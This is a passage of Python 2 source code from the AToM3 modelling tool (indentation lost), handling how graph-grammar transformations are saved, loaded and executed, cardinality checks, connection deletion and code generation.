if( self.editDialogIsOpen( 'save transformation' ) ): return
# Check if the transformation already has a name
if( saveAsFile ):
fileName = None
showDialog = False
else:
fileName = self.statusbar.getState(StatusBar.TRANSFORMATION)[1][1]
showDialog = True
# If the fileName is known, then offer to overwrite previous trans
if( fileName and (fileName != "Nonamed") ):
saveDialog = Dialog.Dialog(None, {'title': 'Save Transformation',
'text':
'Overwrite the previous transformation "' \
+str(fileName)+'" ?',
'bitmap': '',
'default': 0,
'strings': ('Overwrite','Save as dialog')})
if( saveDialog.num == 0 ):
showDialog = False
# Save As Dialog
if( showDialog ):
# Choose an initialdir for the file dialog
if( self.initialDirectoryDict[ 'OpenSaveTrans' ] ):
initialdir = self.initialDirectoryDict[ 'OpenSaveTrans' ]
else:
initialdir = self.initialDirectoryDict[ 'OpenSaveModel' ]
fileName = tkFileDialog.asksaveasfilename(
filetypes=[("All files","*"),("GraphGrammar models", "*_GG_mdl.py")],
initialdir=initialdir )
if( saveAsFile ): fileName = saveAsFile
if( not fileName): return # File dialog was cancelled
setCursor( self.parent, 'Busy' )
# Python source code must always have its .py extension...
if( fileName[-3:] != '.py' ): fileName += '.py'
# Easy identification of Transformation
if( not re.search( '\w*_GG_mdl', fileName ) ):
fileName = os.path.splitext( fileName )[0] #string.split( fileName, '.' )[0]
fileName += '_GG_mdl.py'
# See if file exists:
if os.path.exists(fileName): # File exists!!
# see if back already exists...
backupFilename = fileName + ".back"
if os.path.exists( backupFilename ): # backup file exists!!
os.remove( backupFilename ) # remove it first
try:
os.rename( fileName, backupFilename )
except:
tkMessageBox.showerror( "Failed to backup file! \n",
fileName + "\nAborting...", parent = self )
return
file = open(fileName, "w+t") # Open file
# import the subclass ...
file.write('from GraphGrammarEdit import *\n') # generate imports...
file.write('from GGruleEdit import *\n\n')
file.write('def savedTrans(self):\n') # create a method called 'savedTrans'
try:
self.EditingGraphGrammar.writeConstructor2File(file, " ", "self.EditingGraphGrammar", 0, 0) # call the method to generate the constructor...
except:
print "Failed to generate code! Restarting AToM3 recommended"
tkMessageBox.showerror( "Failed to generate code! \n",
"Restarting AToM3 recommended", parent = self )
file.write('\n\n')
file.close()
self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.SAVE, None, fileName )
transName = self.statusbar.getState(StatusBar.TRANSFORMATION)[1][0]
if self.console: self.console.appendText('Saving transformation '+transName+' into file '+fileName)
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveTrans' ] = os.path.dirname( fileName )
setCursor( self.parent, 'Default' )
if(editAfter):
self.editTrans()
def loadTrans(self, editAfterLoading=True):
"""
Loads a transformation for editing.
In the future, this must be the same as opening a model.
"""
if( self.editDialogIsOpen( 'load transformation' ) ): return
# Choose an initialdir for the file dialog
if( self.initialDirectoryDict[ 'OpenSaveTrans' ] ):
initialdir = self.initialDirectoryDict[ 'OpenSaveTrans' ]
else:
initialdir = self.initialDirectoryDict[ 'OpenSaveModel' ]
text = "Please choose the starting directory for the file dialog\n"
text += "Last/Default dir is: " + initialdir
openDialog = Dialog.Dialog(None, {'title': 'Opening Model',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Models','Central Formalisms','Last/Default',
'User Models','User Formalisms','Cancel')})
if( openDialog.num == 0 ):
initialDir = MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 2 ):
initialDir = initialdir
elif( openDialog.num == 3 ):
initialDir = USER_MODEL_PATH
elif( openDialog.num == 4 ):
initialDir = USER_MMODEL_PATH
else:
return
fileName = tkFileDialog.askopenfilename(filetypes=[
("GraphGrammar models", "*_GG_mdl.py"),("Python files", "*.py")],
initialdir=initialDir)
# File dialog was cancelled
if( not fileName): return
# Check if the file actually exists
if( not os.path.exists( fileName ) ):
tkMessageBox.showerror( "File Not Found ",
"ATOM3.loadTrans() could not find:\n\n" + fileName,
parent = self )
return
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveTrans' ] = os.path.dirname( fileName )
dir, file = os.path.split(fileName) # Split path and file name
className = string.split (file, ".") # Separate file name and extension
# No className? Doh
if not className[0]: return
# Load the dir in memory and import the file
self.isLoadingModel = True
self.checkInSearchPath(dir)
exec "from "+className[0]+" import *\n" in self.__dict__, self.__dict__
try:
self.savedTrans(self) # call method to load data
self.isLoadingModel = False
except AttributeError:
tkMessageBox.showerror(
"Couldn't load transformation! (AttributeError)",
"Selected file "+file+" does not contain a valid transformation",
parent = self
)
self.isLoadingModel = False
raise
#raise Exception, "Transformation load failed due to 'AttributeError'"
except TypeError:
tkMessageBox.showerror(
"Couldn't load transformation! (TypeError)",
"Selected file "+file+" does not contain a valid transformation",
parent = self
)
self.isLoadingModel = False
raise Exception, "Transformation load failed due to 'TypeError'"
else:
self.isLoadingModel = False
transName = self.EditingGraphGrammar.Name.toString()
self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.LOAD, transName, fileName )
if self.console: self.console.appendText('Loading transformation '+transName+' from file '+fileName)
if(editAfterLoading):
self.editTrans()
def executeTrans(self):
"""
Loads an executable Graph Grammar and executes it on the current graph...
"""
if not self.coupledGG:
self.coupledGG = GrammarExecution(self)
exeT = ATOM3TypeDialog(self, self.coupledGG )
if exeT.result_ok: # OK pressed...
# Get the attributes values
graphGrammars, stepByStep, entitiesMove, animate, execution = self.coupledGG.getValue()
else: return
t = time.time()
self.GraphGrammars = [] # Empty the list of loaded Graph Grammars
for gg in graphGrammars: # For each Graph Grammar
fileName, directory = gg.getValue()
# separate file name and extension
className = string.split (fileName, ".")
# Import the selected file...
if className[0]: # if successful...
self.checkInSearchPath(directory)
# first check if it has been loaded before, to force a recompilation
if className[0] in sys.modules.keys(): # file has already been loaded
text = "This GraphGrammar already exists in memory!\n\n"
text += 'If you have modified the GG, and do not flush the old'
text += ' GG, you will be executing the old GG'
openDialog = Dialog.Dialog(None, {'title': 'WARNING',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Proceed','Flush GG from memory',
'Cancel')})
if(openDialog.num == 2):
return
elif(openDialog.num == 1):
# This is the existing graph grammar in memory, kill the rules
# that it will have imported, as well as the GG itself.
GG = sys.modules[className[0]]
if( hasattr( GG, 'importedModules') ):
for iModule in GG.importedModules:
del sys.modules[iModule]
del sys.modules[className[0]] # delete to force a reload
else:
# Already in memory, just re-use it
self.GraphGrammars.append(self.name2GGdict[className[0]])
continue
# Now load the GG into memory and instantiate it
exec "from "+className[0]+" import *\n" # import the file name
try:
GG = eval(className[0])(self) # create an instance of the last GG loaded
except NameError:
tkMessageBox.showerror(
"Couldn't execute transformation! (NameError)",
"Selected file "+fileName+" does not contain a valid transformation",
parent = self
)
GG = eval(className[0])(self) # Give the actual run-time error
return
except TypeError:
tkMessageBox.showerror(
"Couldn't execute transformation! (TypeError)",
"Selected file "+fileName+" does not contain a valid transformation",
parent = self
)
GG = eval(className[0])(self) # Give the actual run-time error
return
if self.console: self.console.appendText('Executing transformation '+GG.__class__.__name__)
self.GraphGrammars.append(GG) # append it to the list
self.name2GGdict[className[0]] = GG
self.grs = GraphRewritingSys(self, self.GraphGrammars, self.ASGroot) # create a new rewriting system
self.grs.evaluate(stepByStep[1], entitiesMove[1], execution[1], self.genGraphics, animate[1])# evaluate the GG using the current graph
self.closeUnusedMetaModels() # Modified 09 Sep 2002 by JL
if( PRINT_TIME_INFO ):
print "GG loaded in: %.3f seconds\n" % ( time.time() - t )
def closeDialog (self, unused, eventx, eventy):
ct = self.find_visible_closest(eventx, eventy, self.UMLmodel) # find the closest thing
tags = self.UMLmodel.gettags(ct) # get the tags
if tags:
if len(tags) >= 2 and tags[1][:4] == 'ASG_': # it's an embedded model
# open an instance of ATOM3 to select the entity to connect to
obj = VisualObj.Tag2ObjMap[tags[0]] # get the graphical object
ma = ATOM3TypeDialog(self, obj.semanticObject, ATOM3TypeDialog.OPEN, ( None, self.setConnectMode))
elif tags[0][:3] == 'Obj': # then it's a class
if self.ATOM3parent.fromClass and self.ATOM3parent.toClass: # it is the 2nd one
self.ATOM3parent.sem_objTo = VisualObj.Tag2ObjMap[tags[0]].semanticObject # get the semantic object
else: # it is the 1st one
self.ATOM3parent.sem_objFrom = VisualObj.Tag2ObjMap[tags[0]].semanticObject # get the semantic object
self.dialogInstance.ok()
del self.dialogInstance
del self.ATOM3parent
def setEditGGLabel (self, AT3Dialog, ATOM3instance, semanticObject):
"Sets the flag to edit the Graph Grammar Numbering Label conveniently"
semanticObject.editGGLabel = self.editGGLabel
def checkCardinalities(self, objFrom, objTo):
"""
Before connecting these two objects, check whether the connection is valid. Returns None if it is valid; if invalid, returns a
tuple with the error: the 1st component is the error message, the 2nd is the offending object (to be highlighted).
"""
classFrom, classTo = objFrom.__class__.__name__, objTo.__class__.__name__
cardinality1 = self.CardinalityTable[classFrom][classTo] # get cardinality info
cardinality2 = self.CardinalityTable[classTo][classFrom] # get cardinality info
if cardinality1 == [] or cardinality2 == []: # if something is missing, then raise an error
return ("Objects of types "+classFrom+" and "+classTo+" cannot be connected.", objFrom)
card1 = self.checkDirectionOfCardinality(cardinality1, "Source") # Check that the direction of connection is allowed
if not card1:
if objFrom.keyword_:
return ("Wrong connection direction for object: "+objFrom.keyword_.toString(), objFrom)
else:
return ("Wrong connection direction for source object.", objFrom)
numObjects1 = self.countObjectOfClass(objFrom.out_connections_, objTo.__class__.__name__)
min1, max1 = self.getCardinalityValues(card1)
if numObjects1 > max1:
if objFrom.keyword_:
return ("Too many objects of type "+classTo+" connected to "+objFrom.keyword_.toString(), objFrom)
else:
return ("Too many objects of type "+classTo+" connected to source object", objFrom)
card2 = self.checkDirectionOfCardinality(cardinality2, "Destination") # Check that the direction of connection is allowed
if not card2:
if objTo.keyword_:
return ("Wrong connection direction for object: "+objTo.keyword_.toString(), objTo)
else:
return ("Wrong connection direction for destination object.", objTo)
numObjects2 = self.countObjectOfClass(objTo.in_connections_, objFrom.__class__.__name__)
min2, max2 = self.getCardinalityValues(card2)
if numObjects2 > max2:
if objTo.keyword_:
return ("Too many objects of type "+classFrom+" connected to "+objTo.keyword_.toString(), objTo)
else:
return ("Too many objects of type "+classFrom+" connected to source object", objTo)
return None
def getCardinalityValues (self, cardinality ):
"""
gets the numeric values of the cardinality tuple
"""
if cardinality[0] in ["n", "N", "m", "M"]: min = 1000000
else: min = int(cardinality[0])
if cardinality[1] in ["n", "N", "m", "M"]: max = 1000000
else: max = int(cardinality[1])
return (min, max)
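# Illustrative mapping (follows directly from the code above):
#   self.getCardinalityValues(("0", "N")) -> (0, 1000000)
#   self.getCardinalityValues(("1", "2")) -> (1, 2)
# i.e. the letters n/N/m/M mean "unbounded" and are replaced by the
# sentinel value 1000000, for the minimum as well as the maximum.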
def hardCardinalityCheck(self, node):
"""
Performs a cardinality check of node 'node'. If the check is not passed, then a tuple with the error is returned, else None.
"""
entities = self.CardinalityTable.keys() # Get the type of nodes we will have to check...
nodeClass= node.getClass() # Get node's class name
for entity in entities:
if entity in self.CardinalityTable[nodeClass].keys():
cards = self.CardinalityTable[nodeClass][entity] # Get cardinalities to check.
for card in cards:
if card[2] == "Source": theList = node.out_connections_
else: theList = node.in_connections_
numObjects = self.countObjectOfClass(theList, entity)
min, max = self.getCardinalityValues ( card )
if numObjects < min:
if node.keyword_:
return ("Too few objects of type "+entity+" connected to "+node.keyword_.toString()+"("+str(min)+" are needed)", node)
else:
return ("Too few objects of type "+entity+" connected to source object ("+str(min)+" are needed)", node)
elif numObjects > max:
if node.keyword_:
return ("Too many objects of type "+entity+" connected to "+node.keyword_.toString()+"( "+str(max)+" is the maximum)", node)
else:
return ("Too many objects of type "+entity+" connected to source object ( "+str(max)+" is the maximum)", node)
return None
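# Structure assumed by the checks above (inferred from the lookups):
# self.CardinalityTable is a dict of dicts keyed by class name, where each
# entry is a list of (min, max, direction) triples, e.g.
#   self.CardinalityTable['Place']['Transition'] = [('0', 'N', 'Source')]
# The class names 'Place' and 'Transition' are purely illustrative.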
def checkModel(self):
"""
Iterates over all the objects of the model, performing a hard cardinality check.
"""
for nodeType in self.ASGroot.listNodes.keys():
for object in self.ASGroot.listNodes[nodeType]:
res = self.hardCardinalityCheck(object) # perform a 'hard' cardinality check...
if res: return res
return None
def countObjectOfClass(self, objectList, className):
"""
Count the number of objects of class 'className' in objectList
"""
counter = 0
for obj in objectList:
if obj.getClass() == className: counter = counter + 1
return counter
def checkDirectionOfCardinality(self, cardInfo, direction):
"""
cardInfo is a list of tuples with connection information: (min, max, 'direction'). Tries to find a tuple whose
direction matches 'direction'.
"""
card1 = None
for card in cardInfo: # look for source information for objFrom
if card[2] == direction:
card1 = card
break
return card1
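# Example (hypothetical data): with
#   cardInfo = [('0', 'N', 'Source'), ('1', '1', 'Destination')]
# checkDirectionOfCardinality(cardInfo, 'Destination') returns
# ('1', '1', 'Destination'), and None when no tuple carries the requested
# direction.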
def deleteGraphicalConnections(self, node):
"deletes graphical connections of the given entity"
obj = node.graphObject_
obj.erase(self) # Modified Aug 9, 2005 by Denis Dube
# while obj.connections != []:
# c = obj.connections[0]
# obj.connections.remove(c)
# self.UMLmodel.delete(c[0])
return obj
def showGraphicalConnections(self, node):
"Given the node 'node', shows its connections (none of them must be visible!)"
for conObject in node.in_connections_:
if node.graphObject_.hasGraphicalConnection(conObject.graphObject_) < 0: # no connections between them...
self.fromClass = conObject.graphObject_.tag
self.toClass = node.graphObject_.tag
self.showConnection(conObject.graphObject_.tag, node.graphObject_.tag)
self.fromClass = None
self.toClass = None
for conObject in node.out_connections_:
if node.graphObject_.hasGraphicalConnection(conObject.graphObject_) < 0: # no connections between them...
self.fromClass = node.graphObject_.tag
self.toClass = conObject.graphObject_.tag
self.showConnection(node.graphObject_.tag, conObject.graphObject_.tag)
self.fromClass = None
self.toClass = None
def deleteGraphicsOfSemanticEntity (self, node):
"deletes the corresponding graphic entity of the given node"
obj = self.deleteGraphicalConnections(node)
cts = self.UMLmodel.find_withtag(obj.tag)
for c in cts: self.UMLmodel.delete(c)
def getConnectedEntities (self, grHandler):
"Returns a tuple with the semantic entities connected by grHandler"
source, destination = None, None
for nt in self.ASGroot.listNodes.keys():
for node in self.ASGroot.listNodes[nt]:
if node.graphObject_: # if node has graphical Object
htuple = node.graphObject_.hasConnectHandler(grHandler) # see if the object has this handler
if htuple:
if htuple[1] == 0: source = node
else: destination = node
return (source, destination)
def deleteConnection(self, handler, tag):
"""
Deletes the connection given by handler,
invoking the corresponding pre and post action
-Modified by Denis to take hyperedges into full account
"""
obj = VisualObj.Tag2ObjMap[tag] # obtain the visual object
connSemantic = obj.semanticObject # obtain the semantic object
# Preconditions
# Root
res = self.ASGroot.preCondition(ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
# Connection
res = connSemantic.preCondition(ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
sourceList = connSemantic.in_connections_
destinationList = connSemantic.out_connections_
# Sources
for source in sourceList:
for destination in destinationList:
res = source.preCondition (ASGNode.DISCONNECT,destination, "SOURCE" )
if res:
self.constraintViolation(res)
return
# Destinations
for destination in destinationList:
for source in sourceList:
res = destination.preCondition (ASGNode.DISCONNECT, source, "DESTINATION")
if res:
self.constraintViolation(res)
return
# Pre-actions
# Root
self.ASGroot.preAction(ASGNode.DISCONNECT)
# Connection
connSemantic.preAction(ASGNode.DISCONNECT)
# Sources & Destinations
for source in sourceList:
for destination in destinationList:
source.preAction(ASGNode.DISCONNECT, destination, "SOURCE")
for destination in destinationList:
for source in sourceList:
destination.preAction(ASGNode.DISCONNECT, source, "DESTINATION")
#
# Now check if we have to erase it from a named port (added 7 Oct 2002)
#
namedPort_Source = None
namedPort_Destination = None
for source in sourceList:
namedPort_Source = source.graphObject_.getNamedPort(handler)
if namedPort_Source:
if(obj.semanticObject in source.getAttrValue(namedPort_Source)):
source.getAttrValue(namedPort_Source).remove(obj.semanticObject)
else:
print 'WARNING (deleteConnection): Remove source failed', __file__
for destination in destinationList:
namedPort_Destination = destination.graphObject_.getNamedPort(handler)
if namedPort_Destination:
if(obj.semanticObject in destination.getAttrValue(namedPort_Destination)):
destination.getAttrValue(namedPort_Destination).remove(obj.semanticObject)
else:
print 'WARNING destination.getAttrValue(namedPort_Destination): Remove destination failed', __file__
#
# End named port processing...
#
# Delete graphical and semantic connections
link_removed = obj.removeConnection(self, handler)
# This is needed when deleting hyperedges
for source in sourceList:
for destination in destinationList:
if( source != None and source.graphObject_ != None and
issubclass( destination.graphObject_.__class__, graphLink ) ):
source.graphObject_.removeConnection(self, handler)
if( obj.centerObject and VisualObj.Tag2ObjMap.has_key( obj.centerObject.tag ) ):
self.deleteRealEntity( obj.centerObject.tag )
for destination in destinationList:
destination.graphObject_.removeConnection(self, handler) # maybe destination is None (an unconnected connection)
for source in sourceList:
for destination in destinationList:
self.deleteSemConnection( [source, destination] )
if link_removed == 2: # a 2 means that the whole link has been removed
obj.semanticObject.removeNode()
# Post Conditions
res = self.ASGroot.postCondition (ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
res = connSemantic.postCondition (ASGNode.DISCONNECT)
if res:
self.constraintViolation(res)
return
for source in sourceList:
for destination in destinationList:
res = source.postCondition (ASGNode.DISCONNECT,destination, "SOURCE" )
if res:
self.constraintViolation(res)
return
for destination in destinationList:
for source in sourceList:
res = destination.postCondition (ASGNode.DISCONNECT, source, "DESTINATION")
if res:
self.constraintViolation(res)
return
# Disconnect root, connection, source, destination POST ACTIONS
self.ASGroot.postAction(ASGNode.DISCONNECT)
for source in sourceList:
for destination in destinationList:
#print 'source', source.__class__.__name__, 'disconnect'
source.postAction(ASGNode.DISCONNECT, destination, "SOURCE")
connSemantic.postAction(ASGNode.DISCONNECT, destination, "SOURCE")
for destination in destinationList:
for source in sourceList:
#print 'destination', destination.__class__.__name__, 'disconnect'
destination.postAction(ASGNode.DISCONNECT, source, "DESTINATION")
connSemantic.postAction(ASGNode.DISCONNECT, source, "DESTINATION")
#================================================================================
#Hierarchical structure maintenance, see HierarchicalASGNode.py for more info
#================================================================================
if(connSemantic.isHierarchicalLink()):
for parent in sourceList :
parent._delHierChildrenList(destinationList)
for child in destinationList:
child._delHierParent()
def deleteSemConnection (self, objects):
""" delete the connections from the semantic entities..."""
if( objects[0] == None or objects[1] == None ):
print "\nWARNING: Nothing to delete! Atom3.deleteSemConnection() ", objects
return
# Unary relations: both ends of connection are the same object
if( not objects[0]) :
objects[0] = objects[1]
elif( not objects[1] ):
objects[1] = objects[0]
# Remove 1 from 0's outgoing connections
if( objects[1] in objects[0].out_connections_ ):
objects[0].out_connections_.remove(objects[1])
# Remove 0 from 1's incoming connections
if( objects[0] in objects[1].in_connections_ ):
objects[1].in_connections_.remove(objects[0])
self.mode = self.IDLEMODE
def changeMode (self, event):
"""
Changes the mode (the user clicked in a button created on the fly).
If the mode ends with "&&EXEC" then it is not a drawing mode and the method should be executed right away (Added 27 July 2002, JL)
"""
self.mode = self.modes[event.widget]
if find (self.mode, "&&EXEC") > -1: # ey, not a drawing mode... (Added 27 July 2002, JL)
action = self.mode
self.mode = self.IDLEMODE # set back to idle mode
self.userActionsMap[action](self, 0, 0) # in this case, no information about the click coordinates
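# Illustrative sketch (inferred from the test above, names hypothetical):
# modes whose string ends in "&&EXEC" are treated as immediate actions, so
# an entry such as
#   self.userActionsMap['layoutModel&&EXEC'] = layoutCallback
# would run layoutCallback(self, 0, 0) as soon as its button is pressed,
# instead of arming the canvas for a subsequent click.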
def newModeModel(self):
"""
enters in the INSERTModel mode
"""
self.mode = self.INSERTModel
def expandModeModel(self):
"""
enters in the EXPANDModel mode
"""
self.mode = self.EXPANDModel
def highLightGraphs(self, graphList, flag = True):
"""
highlights all the graphs contained in the list so the user can select one.
- graphList: a list of graphs. A graph is a tuple ( <id>, [nodes]), where id is an integer and
[nodes] is a list of nodes. Enters the SELECTgraph mode.
"""
self.graphs2select = graphList # save the list, because we'll have to wait for the user to click on some node
self.highLightNodesInGraphs(self.graphs2select, flag) # Highlight each node
self.mode = self.SELECTgraph # put system in select graph mode
def selectGraph(self, unUsed, wx, wy):
"""This function is called when the user clicks on canvas and the mode is SELECTgraph"""
x, y = self.UMLmodel.canvasx(wx), self.UMLmodel.canvasy(wy) # convert to canvas coordinate system
ct = self.find_visible_closest(x, y, self.UMLmodel)
tags = self.UMLmodel.gettags(ct)
if tags and tags[0] != 'current': # i.e. we don't have a connection
obj = VisualObj.Tag2ObjMap[tags[0]].semanticObject # get semanticObject
# Now look for the graph whose node have been clicked
for graphTuple in self.graphs2select:
id, graph = graphTuple # unwrap graph information
if obj in graph: # ey, we've found the subgraph that's been clicked
self.mode = self.IDLEMODE # only if the clicked node belongs to some graph return to IDLE state
self.highLightNodesInGraphs(self.graphs2select, 0) # un-Highlight each node
self.grs.executeRule(graphTuple) # execute the rule that's been selected
self.graphs2select = []
return
def highLightNodesInGraphs(self, graphList, flag):
"""
Highlights (flag = 1) or LowLights (flag = 0) all the VISIBLE elements with the 'selected' tag.
- graphList: is a list of tuples (id,[node])
"""
highLighted = [] # list of highlighted nodes (do not highlight them twice, or we'll lose their color)
for grp in graphList: # for each graph
id, graph = grp
for node in graph:
if not node in highLighted: # if not highlighted yet, do it
node.graphObject_.HighLight( flag)
highLighted.append(node)
def __isItemVisible (self, itemHandler, canvas ):
"""
Returns 1 if the item is visible, 0 otherwise
"""
dc = canvas
itemtype = dc.type(itemHandler)
# Images
if(itemtype == 'image'):
return True
# Line/Text uses the fill attribute to be visible
elif(itemtype in ['line', 'text']):
if(dc.itemcget(itemHandler, "fill") in ["", None]):
return False
return True
# Window
elif(itemtype == 'window'):
return False
# Anything else: polygon, etc.
else:
if(dc.itemcget(itemHandler, "outline") in ["", None]
and dc.itemcget(itemHandler, "fill") in ["", None]):
return False
return True
def __dist ( self, x0, y0, x1, y1 ):
"""
calculates the distance between 2 points
Added : 10 July 2002 JL
"""
return math.sqrt(abs((x0-x1)*(x0-x1)+(y0-y1)*(y0-y1)))
def __point2Segment ( self, px, py, sx0, sy0, sx1, sy1):
"""
calculates distance from a point to a segment. I use the algorithm given in:
http://geometryalgorithms.com/Archive/algorithm_0102/algorithm_0102.htm
Added : 10 July 2002 JL
"""
def dot ( w, v):
"""
calculates the dot product of two vectors
"""
return w[0]*v[0]+w[1]*v[1]
v = (sx1 - sx0, sy1 - sy0) # v = s[1]-[s0]
w = (px - sx0, py - sy0) # w = P-s[0]
c1 = dot(w,v)
if ( c1 <= 0 ): return self.__dist(px, py, sx0, sy0)
c2 = dot(v,v)
if ( c2 <= c1 ): return self.__dist(px, py, sx1, sy1)
b = c1 / c2
Pb = sx0 + b * v[0], sy0 + b * v[1]
return self.__dist(px, py, Pb[0], Pb[1])
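# Worked example of the projection above (added commentary): with v = s1-s0
# and w = P-s0, b = (w.v)/(v.v) parametrizes P's orthogonal projection onto
# the line through s0 and s1:
#   c1 <= 0  -> projection falls before s0, distance is dist(P, s0)
#   c2 <= c1 -> projection falls past s1, distance is dist(P, s1)
#   else     -> distance to Pb = s0 + b*v
# E.g. P=(0,1), s0=(0,0), s1=(2,0): c1 = 0, so the result is dist(P, s0) = 1.0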
def constraintViolation(self, res):
"""
A constraint violation has occurred, and a message has to be given. The message is the 1st component
of the tuple 'res'. The 2nd component is the object to be highlighted.
"""
if res[1] and (type(res[1])!= StringType):
if issubclass(res[1].__class__, VisualObj):
res[1].HighLight(1)
elif issubclass( res[1].__class__, ASGNode):
res[1].graphObject_.HighLight(1)
tkMessageBox.showwarning("constraint violation! ",res[0],parent = self)
if res[1] and type(res[1])!= StringType:
if issubclass(res[1].__class__, VisualObj):
res[1].HighLight(0)
elif issubclass( res[1].__class__,ASGNode):
res[1].graphObject_.HighLight(0)
return 0
def writeSetValue(self, f, obj, objName, indent, deep = 0):
"""
writes in the file 'f' the value of obj (an ATOM3Type). The object name must be objName.
This is a 'visitor' method.
"""
f.write(indent+objName+"="+obj.getTypeName()+"()\n") # write the constructor
if obj.getTypeName() == 'ATOM3String': # if it is a string, enclose between quotes
f.write(indent+objName+".setValue('"+str(obj.getValue())+"')\n")
elif obj.getTypeName() == 'ATOM3List': # if it is a list
f.write(indent+"objlist"+str(deep)+" =[]\n")
value = obj.getValue()
for ob in value:
self.writeSetValue(f, ob, objName+str(deep+1), indent, deep+1) # write object value
f.write(indent+"objlist"+str(deep)+".append("+objName+")\n")
f.write(indent+objName+".setValue(objlist"+str(deep)+")\n")
actFlags = obj.getActionFlags() # get the action flags of the ATOM3List
actFlags = actFlags[:3] + [0] # eliminate the meta-flag (note: list.append() returns None, so it cannot be used here)
f.write(indent+objName+".setActionFlags("+str(actFlags)+")\n")
else:
f.write(indent+objName+".setValue("+str(obj.getValue())+")\n") # the constructor was already written above
def findKeywordAndIcons(self, f, item, counter):
"""Searches for the keyword attribute and icons. Writes the keyword (if any). This ensures that the keyword is written first.
- f is the file
- item is an instance of ATOM3Attribute
- counter: the order of the attribute
This is a 'visitor' method to be called by visitorOnAttributes, for code generation purposes.
"""
value = item.getValue() # (attrName, typeID, initialValue|None, isKey, directEditing)
if value[3][1] == 1: # only write to file if it is the keyword.
item.initialValue.writeConstructor2File( f, ' ', 'self.'+str(value[0]), 0, 1 )
f.write(' self.keyword_= self.'+str(value[0])+'\n')
self.theKeyword = str(value[0])
if value[1] == "Appearance": # if it has an attribute of type appearance, write it down. If it has an appearance...
self.hasAppearance = 1 # ... it must also have a keyword.
attribType = self.types[str(value[1])][0].__name__
if attribType == 'ATOM3List':
if item.initialValue:
itl = item.initialValue.itemType.__name__ # get the initial value...
if itl == "ATOM3Appearance":
self.hasAppearance = 1
elif itl in ["ATOM3List", "ATOM3Attribute"]:
items = item.initialValue.getValue() # get items, and look for 'Appearances'
for element in items:
if self.findIcon(element): return
def findIcon(self, item):
"""
Sets the flag 'self.hasAppearance' to 1 if the item is an ATOM3Appearance. Proceeds recursively if the item is an
ATOM3Attribute or a list. This is an auxiliary method for code generation.
"""
if item.getTypeName() == "ATOM3Appearance": # check if it is an appearance...
self.hasAppearance = 1
return 1
elif item.getTypeName() == "ATOM3List":
theType = item.itemType.__name__ # get the Type...
if theType == "ATOM3Appearance":
self.hasAppearance = 1
return 1
elif theType in ["ATOM3List", "ATOM3Attribute"]:
items = item.getValue() # get items, and look for 'Appearances'
for element in items:
if self.findIcon(element): return 1
return 0
elif item.getTypeName() == "ATOM3Attribute":
if item.initialValue: return self.findIcon(item.initialValue) # check the initial value
return 0
return 0
def writeCreation(self, f, item, counter):
"""writes in f the statements necessary to create the object. Does not write the keyword, because the previous function was supposed to do it.
- f is the file
- item is an instance of ATOM3Attribute
- counter: the order of the attribute
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue() # (attrName, typeID, initialValue|None, isKey, directEditing)
if value[1] == 'Port': # if it is a Port... (Added by JL, 24 July 2002)
f.write(' self.'+str(value[0])+' = []\n')
return
if value[3][1] != 1: # only write it if it is not a keyword.
item.initialValue.writeConstructor2File( f, ' ', 'self.'+str(value[0]), 0, 1 )
if value[1] == "Appearance": # if it has an attribute of type appearance, write it down. If it has an appearance...
self.hasAppearance = 1 # ... it must also have a keyword.
def writeGeneratedDictionary(self, f, item, counter):
"""
write in f the contents of the dictionary of generated attributes.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue()
if value[1] != 'Port': # Added 24 July 2002 by JL
if self.writed == 1:
f.write(",\n ")
f.write( "'"+str(value[0])+"': ('ATOM3"+str(value[1])+"'")
if value[1] == 'List' and item.initialValue.itemType: # Added 25 July 2002 by JL
f.write(", '"+item.initialValue.itemType.__name__+"')") # Added 25 July 2002 by JL
else:
f.write(", )")
self.writed = 1
def writeDirectEditingList (self, f, item, counter):
"""
write in f the contents of the list with the flag that tells if the widget should be edited directly.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
Added 31 July 2002, by JL.
"""
value = item.getValue()
if self.writed == 1: f.write(",")
f.write( str(value[4][1]) )
self.writed = 1
def writeRealOrderList(self, f, item, counter):
"""
write in f the contents of the list with the order of generated attributes.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue()
if value[1] != 'Port': # Added 24 July 2002 by JL
if self.writed == 1: f.write(",")
f.write( "'"+str(value[0])+"'")
self.writed = 1
def genImport(self, f, item, counter):
"""
adds in the list importedTypes the necessary types to be imported.
These are 'visitor' methods called by visitorOnAttributes for code generation purposes.
"""
value = item.getValue()
attribType = self.types[str(value[1])][0].__name__
if not attribType in self.importedTypes:
self.importedTypes.append(attribType)
# if it is a list, import the list's type
if attribType == 'ATOM3List':
if item.initialValue:
itl = item.initialValue.itemType.__name__
if not itl in self.importedTypes:
self.importedTypes.append(itl)
if itl == "ATOM3Attribute":
self.addAllTypes2List(self.importedTypes)
elif itl == "ATOM3List":
# now look for the initial items, and import each one's type...
initialItems = item.initialValue.getValue() # get a list of items...
for initialItem in initialItems: # do not shadow the 'item' parameter
self.addItemType2List(initialItem, self.importedTypes)
if initialItems == []: # no initial items, so add the default type for lists (attributes)
if not "ATOM3Attribute" in self.importedTypes:
self.importedTypes.append("ATOM3Attribute")
# if it is of type ATOM3Attribute, then add all the available types...
self.addAllTypes2List(self.importedTypes)
else:
if not "ATOM3Attribute" in self.importedTypes:
self.importedTypes.append("ATOM3Attribute")
# if it is of type ATOM3Attribute, then add all the available types...
self.addAllTypes2List(self.importedTypes)
def addAllTypes2List(self, list):
"""
Auxiliary method for genImport. adds the name of all the available types to the list
"""
for typeName in self.types.keys():
tupleType = self.types[typeName]
name = tupleType[0].__name__
if not name in list: list.append(name)
def addItemType2List(self, item, list):
"""
Auxiliary method for genImport. adds the type of item to the list (if it is not present yet)
"""
theType = item.getTypeName()
if not theType in list: list.append(theType)
